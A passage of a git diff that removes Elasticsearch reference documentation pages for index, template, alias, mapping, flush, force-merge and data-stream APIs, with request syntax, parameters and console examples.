{api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams to delete. -Wildcard (`*`) expressions are supported. diff --git a/docs/reference/indices/delete-index-template-v1.asciidoc b/docs/reference/indices/delete-index-template-v1.asciidoc deleted file mode 100644 index 3ad0a0e347c..00000000000 --- a/docs/reference/indices/delete-index-template-v1.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[[indices-delete-template-v1]] -=== Delete index template API -++++ -Delete index template (legacy) -++++ - -IMPORTANT: This documentation is about <>, which are deprecated and will be replaced by the composable -templates introduced in {es} 7.8. For information about composable templates, -see <>. - -Deletes a legacy index template. - -//// -[source,console] --------------------------------------------------- -PUT _template/my-legacy-index-template -{ - "index_patterns" : ["te*"], - "settings": { - "number_of_shards": 1 - } -} --------------------------------------------------- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -DELETE /_template/my-legacy-index-template --------------------------------------------------- - - -[[delete-template-api-v1-request]] -==== {api-request-title} - -`DELETE /_template/` - - -[[delete-template-api-v1-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of legacy index templates to delete. Wildcard (`*`) -expressions are supported. - - -[[delete-template-api-v1-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-index-template.asciidoc b/docs/reference/indices/delete-index-template.asciidoc deleted file mode 100644 index 65516d828bb..00000000000 --- a/docs/reference/indices/delete-index-template.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[indices-delete-template]] -=== Delete index template API -++++ -Delete index template -++++ - -Deletes an <>. - -//// -[source,console] ----- -PUT /_index_template/my-index-template -{ - "index_patterns" : ["te*"], - "template": { - "settings": { - "number_of_shards": 1 - } - } -} ----- -// TESTSETUP -//// - -[source,console] ----- -DELETE /_index_template/my-index-template ----- - - -[[delete-template-api-request]] -==== {api-request-title} - -`DELETE /_index_template/` - - -[[delete-template-api-desc]] -==== {api-description-title} - -Use the delete index template API to delete one or more index templates. -Index templates define <>, <>, -and <> that can be applied automatically to new indices. - - -[[delete-template-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-template] - - -[[delete-template-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/delete-index.asciidoc b/docs/reference/indices/delete-index.asciidoc deleted file mode 100644 index 19112da63d9..00000000000 --- a/docs/reference/indices/delete-index.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[indices-delete-index]] -=== Delete index API -++++ -Delete index -++++ - -Deletes an existing index. - -[source,console] --------------------------------------------------- -DELETE /my-index-000001 --------------------------------------------------- -// TEST[setup:my_index] - - -[[delete-index-api-request]] -==== {api-request-title} - -`DELETE /` - - -[[delete-index-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Request, string) Comma-separated list or wildcard expression of indices to -delete. - -In this parameter, wildcard expressions match only open, concrete indices. You -cannot delete an index using an <>. - -To delete all indices, use `_all` or `*` . To disallow the deletion of indices -with `_all` or wildcard expressions, change the -`action.destructive_requires_name` cluster setting to `true`. You can update -this setting in the `elasticsearch.yml` file or using the -<> API. - -NOTE: You cannot delete the current write index of a data stream. To delete the -index, you must <> the data stream so a new -write index is created. You can then use the delete index API to delete the -previous write index. --- - - -[[delete-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/flush.asciidoc b/docs/reference/indices/flush.asciidoc deleted file mode 100644 index 9601476412b..00000000000 --- a/docs/reference/indices/flush.asciidoc +++ /dev/null @@ -1,142 +0,0 @@ -[[indices-flush]] -=== Flush API -++++ -Flush -++++ - -Flushes one or more data streams or indices. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_flush --------------------------------------------------- -// TEST[setup:my_index] - - -[[flush-api-request]] -==== {api-request-title} - -`POST //_flush` - -`GET //_flush` - -`POST /_flush` - -`GET /_flush` - - -[[flush-api-desc]] -==== {api-description-title} - -Flushing a data stream or index is the process of making sure that any data that is currently -only stored in the <> is also -permanently stored in the Lucene index. When restarting, {es} replays any -unflushed operations from the transaction log into the Lucene index to bring it -back into the state that it was in before the restart. {es} automatically -triggers flushes as needed, using heuristics that trade off the size of the -unflushed transaction log against the cost of performing each flush. - -Once each operation has been flushed it is permanently stored in the Lucene -index. This may mean that there is no need to maintain an additional copy of it -in the transaction log, unless <>. The transaction log is made up of multiple files, -called _generations_, and {es} will delete any generation files once they are no -longer needed, freeing up disk space. - -It is also possible to trigger a flush on one or more indices using the flush -API, although it is rare for users to need to call this API directly. If you -call the flush API after indexing some documents then a successful response -indicates that {es} has flushed all the documents that were indexed before the -flush API was called. - - -[[flush-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to flush. -Wildcard expressions (`*`) are supported. -+ -To flush all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[flush-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`force`:: -+ --- -(Optional, Boolean) -If `true`, -the request forces a flush -even if there are no changes to commit to the index. -Defaults to `true`. - -You can use this parameter -to increment the generation number of the transaction log. - -This parameter is considered internal. --- - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`wait_if_ongoing`:: -+ --- -(Optional, Boolean) -If `true`, -the flush operation blocks until execution -when another flush operation is running. - - -If `false`, -{es} returns an error -if you request a flush -when another flush operation is running. - -Defaults to `true`. --- - - -[[flush-api-example]] -==== {api-examples-title} - - -[[flush-api-specific-ex]] -===== Flush a specific data stream or index - -[source,console] ----- -POST /my-index-000001/_flush ----- -// TEST[s/^/PUT my-index-000001\n/] - - -[[flush-multi-index]] -===== Flush several data streams and indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_flush ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[flush-api-all-ex]] -===== Flush all data streams and indices in a cluster - -[source,console] ----- -POST /_flush ----- diff --git a/docs/reference/indices/forcemerge.asciidoc b/docs/reference/indices/forcemerge.asciidoc deleted file mode 100644 index 8c83e93a127..00000000000 --- a/docs/reference/indices/forcemerge.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[[indices-forcemerge]] -=== Force merge API -++++ -Force merge -++++ - -Forces a <> on the shards of one or more indices. -For data streams, the API forces a merge on the shards of the stream's backing -indices. - -[source,console] ----- -POST /my-index-000001/_forcemerge ----- -// TEST[setup:my_index] - - -[[forcemerge-api-request]] -==== {api-request-title} - -`POST //_forcemerge` - -`POST /_forcemerge` - - -[[forcemerge-api-desc]] -==== {api-description-title} - -Use the force merge API to force a <> on the -shards of one or more indices. Merging reduces the number of segments in each -shard by merging some of them together, and also frees up the space used by -deleted documents. Merging normally happens automatically, but sometimes it is -useful to trigger a merge manually. - -WARNING: **Force merge should only be called against an index after you have -finished writing to it.** Force merge can cause very large (>5GB) segments to -be produced, and if you continue to write to such an index then the automatic -merge policy will never consider these segments for future merges until they -mostly consist of deleted documents. This can cause very large segments to -remain in the index which can result in increased disk usage and worse search -performance. - - -[[forcemerge-blocks]] -===== Blocks during a force merge - -Calls to this API block until the merge is complete. If the client connection -is lost before completion then the force merge process will continue in the -background. Any new requests to force merge the same indices will also block -until the ongoing force merge is complete. - - -[[forcemerge-multi-index]] -===== Force merging multiple indices - -You can force merge multiple indices with a single request by targeting: - -* One or more data streams that contain multiple backing indices -* Multiple indices -* One or more index aliases that point to multiple indices -* All data streams and indices in a cluster - -Multi-index operations are executed one shard at a -time per node. Force merge makes the storage for the shard being merged -temporarily increase, up to double its size in case `max_num_segments` parameter -is set to `1`, as all segments need to be rewritten into a new one. - - -[[forcemerge-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[forcemerge-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`flush`:: -(Optional, Boolean) -If `true`, -{es} performs a <> on the indices -after the force merge. -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`max_num_segments`:: -+ --- -(Optional, integer) -The number of segments to merge to. -To fully merge indices, -set it to `1`. - -Defaults to checking if a merge needs to execute. -If so, executes it. --- - -`only_expunge_deletes`:: -+ --- -(Optional, Boolean) -If `true`, -only expunge segments containing document deletions. -Defaults to `false`. - -In Lucene, -a document is not deleted from a segment; -just marked as deleted. -During a merge, -a new segment is created -that does not contain those document deletions. - -NOTE: This parameter does *not* override the -`index.merge.policy.expunge_deletes_allowed` setting. --- - - -[[forcemerge-api-example]] -==== {api-examples-title} - - -[[forcemerge-api-specific-ex]] -===== Force merge a specific data stream or index - -[source,console] ----- -POST /my-index-000001/_forcemerge ----- -// TEST[continued] - - -[[forcemerge-api-multiple-ex]] -===== Force merge several data streams or indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_forcemerge ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[forcemerge-api-all-ex]] -===== Force merge all indices - -[source,console] ----- -POST /_forcemerge ----- - - -[[forcemerge-api-time-based-index-ex]] -===== Data streams and time-based indices - -Force-merging is useful for managing a data stream's older backing indices and -other time-based indices, particularly after a -<>. -In these cases, -each index only receives indexing traffic for a certain period of time. -Once an index receive no more writes, -its shards can be force-merged to a single segment. - -[source,console] --------------------------------------------------- -POST /.ds-logs-000001/_forcemerge?max_num_segments=1 --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/.ds-logs-000001/my-index-000001/] - -This can be a good idea because single-segment shards can sometimes use simpler -and more efficient data structures to perform searches. diff --git a/docs/reference/indices/get-alias.asciidoc b/docs/reference/indices/get-alias.asciidoc deleted file mode 100644 index d9b6ee31f27..00000000000 --- a/docs/reference/indices/get-alias.asciidoc +++ /dev/null @@ -1,183 +0,0 @@ -[[indices-get-alias]] -=== Get index alias API -++++ -Get index alias -++++ - -Returns information about one or more index aliases. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -GET /my-index-000001/_alias/alias1 ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000001\/_alias\/alias1\n/] - - -[[get-alias-api-request]] -==== {api-request-title} - -`GET /_alias` - -`GET /_alias/` - -`GET //_alias/` - - -[[get-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] -+ -To retrieve information for all index aliases, -use a value of `_all` or `*`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - - -[[get-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `all`. - -`ignore_unavailable`:: -(Optional, Boolean) -If `false`, requests that include a missing index in the `` argument -return an error. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - - -[[get-alias-api-example]] -==== {api-examples-title} - -[[get-alias-api-all-ex]] -===== Get all aliases for an index - -You can add index aliases during index creation -using a <> request. - -The following create index API request creates the `logs_20302801` index -with two aliases: - -* `current_day` -* `2030`, which only returns documents -in the `logs_20302801` index -with a `year` field value of `2030` - -[source,console] --------------------------------------------------- -PUT /logs_20302801 -{ - "aliases" : { - "current_day" : {}, - "2030" : { - "filter" : { - "term" : {"year" : 2030 } - } - } - } -} --------------------------------------------------- - -The following get index alias API request returns all aliases -for the index `logs_20302801`: - -[source,console] --------------------------------------------------- -GET /logs_20302801/_alias/* --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "logs_20302801" : { - "aliases" : { - "current_day" : { - }, - "2030" : { - "filter" : { - "term" : { - "year" : 2030 - } - } - } - } - } -} --------------------------------------------------- - - -[[get-alias-api-named-ex]] -===== Get a specific alias - -The following index alias API request returns the `2030` alias: - -[source,console] --------------------------------------------------- -GET /_alias/2030 --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "logs_20302801" : { - "aliases" : { - "2030" : { - "filter" : { - "term" : { - "year" : 2030 - } - } - } - } - } -} --------------------------------------------------- - - -[[get-alias-api-wildcard-ex]] -===== Get aliases based on a wildcard - -The following index alias API request returns any alias that begin with `20`: - -[source,console] --------------------------------------------------- -GET /_alias/20* --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "logs_20302801" : { - "aliases" : { - "2030" : { - "filter" : { - "term" : { - "year" : 2030 - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/get-component-template.asciidoc b/docs/reference/indices/get-component-template.asciidoc deleted file mode 100644 index 52eca0b0ab8..00000000000 --- a/docs/reference/indices/get-component-template.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[[getting-component-templates]] -=== Get component template API -++++ -Get component template -++++ - -Retrieves information about one or more component templates. - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_component_template/template_1 -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_component_template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_component_template/template_1 --------------------------------------------------- - -[[get-component-template-api-request]] -==== {api-request-title} - -`GET /_component-template/` - - -[[get-component-template-api-path-params]] -==== {api-path-parms-title} - -`` -(Optional, string) -Comma-separated list of component template names used to limit the request. -Wildcard (`*`) expressions are supported. - - -[[get-component-template-api-query-params]] -==== {api-query-parms-title} - -include::{docdir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=local] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-component-template-api-example]] -==== {api-examples-title} - - -[[get-component-template-api-wildcard-ex]] -===== Get component templates using a wildcard expression - -[source,console] --------------------------------------------------- -GET /_component_template/temp* --------------------------------------------------- - - -[[get-component-template-api-all-ex]] -===== Get all component templates - -[source,console] --------------------------------------------------- -GET /_component_template --------------------------------------------------- diff --git a/docs/reference/indices/get-data-stream.asciidoc b/docs/reference/indices/get-data-stream.asciidoc deleted file mode 100644 index 3b8e484d697..00000000000 --- a/docs/reference/indices/get-data-stream.asciidoc +++ /dev/null @@ -1,243 +0,0 @@ -[role="xpack"] -[[indices-get-data-stream]] -=== Get data stream API -++++ -Get data stream -++++ - -Retrieves information about one or more <>. -See <>. - -//// -[source,console] ----- -PUT /_ilm/policy/my-lifecycle-policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT /_index_template/my-index-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": {}, - "template": { - "settings": { - "index.lifecycle.name": "my-lifecycle-policy" - } - } -} - -PUT /_data_stream/my-data-stream - -POST /my-data-stream/_rollover - -PUT /_data_stream/my-data-stream_two ----- -// TESTSETUP -//// - -//// -[source,console] ----- -DELETE /_data_stream/* -DELETE /_index_template/* -DELETE /_ilm/policy/my-lifecycle-policy ----- -// TEARDOWN -//// - -[source,console] ----- -GET /_data_stream/my-data-stream ----- - -[[get-data-stream-api-request]] -==== {api-request-title} - -`GET /_data_stream/` - -[[get-data-stream-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`view_index_metadata` or `manage` <> -for the data stream. - -[[get-data-stream-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data stream names used to limit the request. Wildcard -(`*`) expressions are supported. If omitted, all data streams will be -returned. - -[role="child_attributes"] -[[get-data-stream-api-response-body]] -==== {api-response-body-title} - -`data_streams`:: -(array of objects) -Contains information about retrieved data streams. -+ -.Properties of objects in `data_streams` -[%collapsible%open] -==== -`name`:: -(string) -Name of the data stream. - -`timestamp_field`:: -(object) -Contains information about the data stream's `@timestamp` field. -+ -.Properties of `timestamp_field` -[%collapsible%open] -===== -`name`:: -(string) -Name of the data stream's timestamp field, which must be `@timestamp`. The -`@timestamp` field must be included in every document indexed to the data -stream. -===== - -`indices`:: -(array of objects) -Array of objects containing information about the data stream's backing -indices. -+ -The last item in this array contains information about the stream's current -<>. -+ -.Properties of `indices` objects -[%collapsible%open] -===== -`index_name`:: -(string) -Name of the backing index. For naming conventions, see -<>. - -`index_uuid`:: -(string) -Universally unique identifier (UUID) for the index. -===== - -`generation`:: -(integer) -Current <> for the data stream. This number -acts as a cumulative count of the stream's rollovers, starting at `1`. - -`status`:: -(string) -<> of the data stream. -+ -This health status is based on the state of the primary and replica shards of -the stream's backing indices. -+ -.Values for `status` -[%collapsible%open] -===== -`green`::: -All shards are assigned. - -`yellow`::: -All primary shards are assigned, but one or more replica shards are -unassigned. - -`red`::: -One or more primary shards are unassigned, so some data is unavailable. -===== - -`template`:: -(string) -Name of the index template used to create the data stream's backing indices. -+ -The template's index pattern must match the name of this data stream. See -<>. - -`ilm_policy`:: -(string) -Name of the current {ilm-init} lifecycle policy in the stream's matching index -template. This lifecycle policy is set in the `index.lifecycle.name` setting. -+ -If the template does not include a lifecycle policy, this property is not -included in the response. -+ -NOTE: A data stream's backing indices may be assigned different lifecycle -policies. To retrieve the lifecycle policy for individual backing indices, -use the <>. -==== - -[[get-data-stream-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET _data_stream/my-data-stream* ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "data_streams": [ - { - "name": "my-data-stream", - "timestamp_field": { - "name": "@timestamp" - }, - "indices": [ - { - "index_name": ".ds-my-data-stream-000001", - "index_uuid": "xCEhwsp8Tey0-FLNFYVwSg" - }, - { - "index_name": ".ds-my-data-stream-000002", - "index_uuid": "PA_JquKGSiKcAKBA8DJ5gw" - } - ], - "generation": 2, - "status": "GREEN", - "template": "my-index-template", - "ilm_policy": "my-lifecycle-policy" - }, - { - "name": "my-data-stream_two", - "timestamp_field": { - "name": "@timestamp" - }, - "indices": [ - { - "index_name": ".ds-my-data-stream_two-000001", - "index_uuid": "3liBu2SYS5axasRt6fUIpA" - } - ], - "generation": 1, - "status": "YELLOW", - "template": "my-index-template", - "ilm_policy": "my-lifecycle-policy" - } - ] -} ----- -// TESTRESPONSE[s/"index_uuid": "xCEhwsp8Tey0-FLNFYVwSg"/"index_uuid": $body.data_streams.0.indices.0.index_uuid/] -// TESTRESPONSE[s/"index_uuid": "PA_JquKGSiKcAKBA8DJ5gw"/"index_uuid": $body.data_streams.0.indices.1.index_uuid/] -// TESTRESPONSE[s/"index_uuid": "3liBu2SYS5axasRt6fUIpA"/"index_uuid": $body.data_streams.1.indices.0.index_uuid/] -// TESTRESPONSE[s/"status": "GREEN"/"status": "YELLOW"/] diff --git a/docs/reference/indices/get-field-mapping.asciidoc b/docs/reference/indices/get-field-mapping.asciidoc deleted file mode 100644 index 1e40c6981f0..00000000000 --- a/docs/reference/indices/get-field-mapping.asciidoc +++ /dev/null @@ -1,252 +0,0 @@ -[[indices-get-field-mapping]] -=== Get field mapping API -++++ -Get field mapping -++++ - -Retrieves <> for one or more fields. For data -streams, the API retrieves field mappings for the stream's backing indices. - -This API is useful if you don't need a <> -or if an index mapping contains a large number of fields. - -[source,console] ----- -GET /my-index-000001/_mapping/field/user ----- -// TEST[setup:my_index] - - -[[get-field-mapping-api-request]] -==== {api-request-title} - -`GET /_mapping/field/` - -`GET //_mapping/field/` - - -[[get-field-mapping-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard (`*`) expressions are supported. -+ -To target all indices in a cluster, omit this parameter or use `_all` or `*`. - -``:: -(Optional, string) Comma-separated list or wildcard expression of fields used to -limit returned information. - - -[[get-field-mapping-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`include_defaults`:: -(Optional, Boolean) If `true`, the response includes default mapping values. -Defaults to `false`. - -`local`:: -deprecated:[7.8.0, This parameter is a no-op and field mappings are always retrieved locally] -(Optional, boolean) If `true`, the request retrieves information from the local -node only. Defaults to `false`, which means information is retrieved from -the master node. - - -[[get-field-mapping-api-example]] -==== {api-examples-title} - -[[get-field-mapping-api-basic-ex]] -===== Example with index setup - -You can provide field mappings when creating a new index. The following -<> API request creates the `publications` -index with several field mappings. - -[source,console] --------------------------------------------------- -PUT /publications -{ - "mappings": { - "properties": { - "id": { "type": "text" }, - "title": { "type": "text" }, - "abstract": { "type": "text" }, - "author": { - "properties": { - "id": { "type": "text" }, - "name": { "type": "text" } - } - } - } - } -} --------------------------------------------------- - -The following returns the mapping of the field `title` only: - -[source,console] --------------------------------------------------- -GET publications/_mapping/field/title --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "publications": { - "mappings": { - "title": { - "full_name": "title", - "mapping": { - "title": { - "type": "text" - } - } - } - } - } -} --------------------------------------------------- - -[[get-field-mapping-api-specific-fields-ex]] -===== Specifying fields - -The get mapping API allows you to specify a comma-separated list of fields. - -For instance to select the `id` of the `author` field, you must use its full name `author.id`. - -[source,console] --------------------------------------------------- -GET publications/_mapping/field/author.id,abstract,name --------------------------------------------------- -// TEST[continued] - -returns: - -[source,console-result] --------------------------------------------------- -{ - "publications": { - "mappings": { - "author.id": { - "full_name": "author.id", - "mapping": { - "id": { - "type": "text" - } - } - }, - "abstract": { - "full_name": "abstract", - "mapping": { - "abstract": { - "type": "text" - } - } - } - } - } -} --------------------------------------------------- - -The get field mapping API also supports wildcard notation. - -[source,console] --------------------------------------------------- -GET publications/_mapping/field/a* --------------------------------------------------- -// TEST[continued] - -returns: - -[source,console-result] --------------------------------------------------- -{ - "publications": { - "mappings": { - "author.name": { - "full_name": "author.name", - "mapping": { - "name": { - "type": "text" - } - } - }, - "abstract": { - "full_name": "abstract", - "mapping": { - "abstract": { - "type": "text" - } - } - }, - "author.id": { - "full_name": "author.id", - "mapping": { - "id": { - "type": "text" - } - } - } - } - } -} --------------------------------------------------- - -[[get-field-mapping-api-multi-index-ex]] -===== Multiple targets and fields - -The get field mapping API can be used to get mappings for multiple fields from -multiple data streams or indices with a single request. - -The `` and `` request path parameters both support -comma-separated lists and wildcard expressions. - -You can omit the `` parameter or use a value of `*` or `_all` to target -all data streams and indices in a cluster. - -Similarly, you can omit the `` parameter or use a value of `*` to -retrieve mappings for all fields in the targeted data streams or indices. -However, the `` parameter does not support the `_all` value. - -For example, the following request retrieves mappings for the `message` field in -any data stream or index named `my-index-000001` or `my-index-000002`. - -[source,console] ----- -GET /my-index-000001,my-index-000002/_mapping/field/message ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\n/] - -The following request retrieves mappings for the `message` and `user.id` fields -in any data stream or index in the cluster. - -[source,console] ----- -GET /_all/_mapping/field/message ----- -// TEST[setup:my_index] - -The following request retrieves mappings for fields with an `id` property in any -data stream or index in the cluster. - -[source,console] ----- -GET /_all/_mapping/field/*.id ----- -// TEST[setup:my_index] diff --git a/docs/reference/indices/get-index-template-v1.asciidoc b/docs/reference/indices/get-index-template-v1.asciidoc deleted file mode 100644 index 7b6d30bee89..00000000000 --- a/docs/reference/indices/get-index-template-v1.asciidoc +++ /dev/null @@ -1,93 +0,0 @@ -[[indices-get-template-v1]] -=== Get index template API -++++ -Get index template (legacy) -++++ - -IMPORTANT: This documentation is about legacy index templates, -which are deprecated and will be replaced by the composable templates introduced in {es} 7.8. -For information about composable templates, see <>. - -Retrieves information about one or more index templates. - -//// -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns" : ["te*"], - "settings": { - "number_of_shards": 1 - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _template/template_1 --------------------------------------------------- -// TEARDOWN - -//// - -[source,console] --------------------------------------------------- -GET /_template/template_1 --------------------------------------------------- - - -[[get-template-v1-api-request]] -==== {api-request-title} - -`GET /_template/` - - -[[get-template-v1-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-template] -+ -To return all index templates, omit this parameter -or use a value of `_all` or `*`. - - -[[get-template-v1-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-template-v1-api-example]] -==== {api-examples-title} - - -[[get-template-v1-api-multiple-ex]] -===== Get multiple index templates - -[source,console] --------------------------------------------------- -GET /_template/template_1,template_2 --------------------------------------------------- - - -[[get-template-v1-api-wildcard-ex]] -===== Get index templates using a wildcard expression - -[source,console] --------------------------------------------------- -GET /_template/temp* --------------------------------------------------- - - -[[get-template-v1-api-all-ex]] -===== Get all index templates - -[source,console] --------------------------------------------------- -GET /_template --------------------------------------------------- diff --git a/docs/reference/indices/get-index-template.asciidoc b/docs/reference/indices/get-index-template.asciidoc deleted file mode 100644 index f38d237c38e..00000000000 --- a/docs/reference/indices/get-index-template.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[indices-get-template]] -=== Get index template API [[getting-templates]] -++++ -Get index template -++++ - -Returns information about one or more index templates. - -//// - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["te*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _index_template/template_* --------------------------------------------------- -// TEARDOWN - -//// - -[source,console] --------------------------------------------------- -GET /_index_template/template_1 --------------------------------------------------- - -[[get-template-api-request]] -==== {api-request-title} - -`GET /_index_template/` - - -[[get-template-api-path-params]] -==== {api-path-parms-title} - -include::{docdir}/rest-api/common-parms.asciidoc[tag=index-template] -+ -To retrieve all index templates, omit this parameter or use a value of `*`. - - -[[get-template-api-query-params]] -==== {api-query-parms-title} - -include::{docdir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-template-api-example]] -==== {api-examples-title} - - -[[get-template-api-wildcard-ex]] -===== Get index templates using a wildcard expression - -[source,console] --------------------------------------------------- -GET /_index_template/temp* --------------------------------------------------- - - -[[get-template-api-all-ex]] -===== Get all index templates - -[source,console] --------------------------------------------------- -GET /_index_template --------------------------------------------------- diff --git a/docs/reference/indices/get-index.asciidoc b/docs/reference/indices/get-index.asciidoc deleted file mode 100644 index b0f4dcbde41..00000000000 --- a/docs/reference/indices/get-index.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[indices-get-index]] -=== Get index API -++++ -Get index -++++ - -Returns information about one or more indices. For data streams, the API -returns information about the stream's backing indices. - -[source,console] --------------------------------------------------- -GET /my-index-000001 --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. Although mappings -in responses no longer contain a type name by default, you can still request the old format -through the parameter include_type_name. For more details, please see <>. - - -[[get-index-api-request]] -==== {api-request-title} - -`GET /` - - -[[get-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[get-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-defaults] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -`ignore_unavailable`:: -(Optional, Boolean) -If `false`, requests that target a missing index return an error. Defaults to -`false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - 